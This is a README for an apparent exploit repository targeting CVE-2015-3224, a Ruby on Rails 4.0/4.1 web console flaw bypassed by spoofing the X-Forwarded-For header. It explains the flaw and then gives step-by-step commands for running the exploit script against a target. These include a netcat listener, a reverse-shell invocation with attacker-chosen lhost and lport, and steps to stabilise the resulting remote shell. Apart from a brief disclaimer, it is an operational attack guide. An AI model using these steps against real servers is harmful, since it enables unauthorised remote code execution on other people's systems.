Ruby on Rails Web Console Exploit (CVE-2015-3224)# Ruby on Rails Web Console Exploit (CVE-2015-3224)
This repository contains a **Python script** to exploit an **IP whitelist bypass vulnerability** in the developer web console of **Ruby on Rails 4.0.x and 4.1.x**. The script allows for **remote code execution** on vulnerable servers.
> ⚠️ **Disclaimer**
> This script is intended for educational purposes and authorized security testing only.
> **Do not** use it on any system without explicit permission.
> The authors are **not responsible** for any misuse or damage caused by this script.
---
## 📌 Description of the Vulnerability
The web console in vulnerable versions of Ruby on Rails is intended for development purposes and should only be accessible from trusted IP addresses. However, due to improper handling of the `X-Forwarded-For` HTTP header, an attacker can **spoof their IP address** to appear as a trusted local user (e.g., `127.0.0.1` or `::1`). This bypasses the IP whitelist and **grants unauthorized access** to the web console, leading to **remote code execution**.
---
## 🚀 Features
- **Easy to Use**: Simple command-line interface.
- **Dynamic Path Discovery**: Automatically probes the target to find the dynamic console session path.
- **Two Shell Modes**:
- **Simple Shell**: A basic, non-interactive shell for quick commands.
- **Reverse TTY Shell**: A one-line command to get a fully interactive PTY reverse shell.
- **Enhanced Readability**: Color-coded output for status messages, successes, and errors.
- **Robust**: Includes error handling for network issues and failed commands.
---
## ✅ Requirements
- Python 3
- `requests` library
Install `requests`:
```bash
pip install requests
```
---
## ⚙️ Usage
1. **Clone the repository:**
```bash
git clone https://github.com/Sic4rio/CVE-2015-3224
cd <repo-directory>
```
2. **Make the script executable:**
```bash
chmod +x exploit.py
```
### Option 1: Simple Interactive Shell
This mode is useful for running quick, simple commands.
```bash
./exploit.py -t http://<TARGET_IP>:<PORT>
```
### Option 2: Full Interactive TTY (Reverse Shell)
This is the recommended mode for a stable, fully interactive shell.
#### Step 1: Start a Listener
On your local machine, open a new terminal and start a `netcat` listener.
```bash
nc -lvnp 9001
```
#### Step 2: Run the Exploit
In another terminal, run the script with the `--rev-shell` flag, providing your local IP (`lhost`) and port (`lport`).
```bash
./exploit.py -t http://<TARGET_IP>:<PORT> --rev-shell --lhost <YOUR_IP> --lport 9001
```
#### Step 3: Stabilize the Shell
A connection will arrive at your `netcat` listener. To upgrade it to a fully interactive TTY, follow these steps *in the netcat window*:
1. **Background the shell** by pressing `Ctrl+Z`.
2. **Set your local terminal to raw mode** and bring the shell to the foreground.
```bash
stty raw -echo; fg
```
Press `Enter` if the prompt doesn't reappear.
3. **Set the terminal properties** on the remote shell.
```bash
reset
export SHELL=bash
export TERM=xterm-256color
stty rows 50 cols 120
```
You now have a fully functional and stable shell!
---
## 👥 Credits
- **Original Exploit**: Eval (@0xEval)
- **The Readme.md file**: GPT
[4.0K] /data/pocs/7f38343f7d3d910c6e18a503265e253a048536d4
├── [6.5K] exploit.py
└── [3.3K] README.md
0 directories, 2 files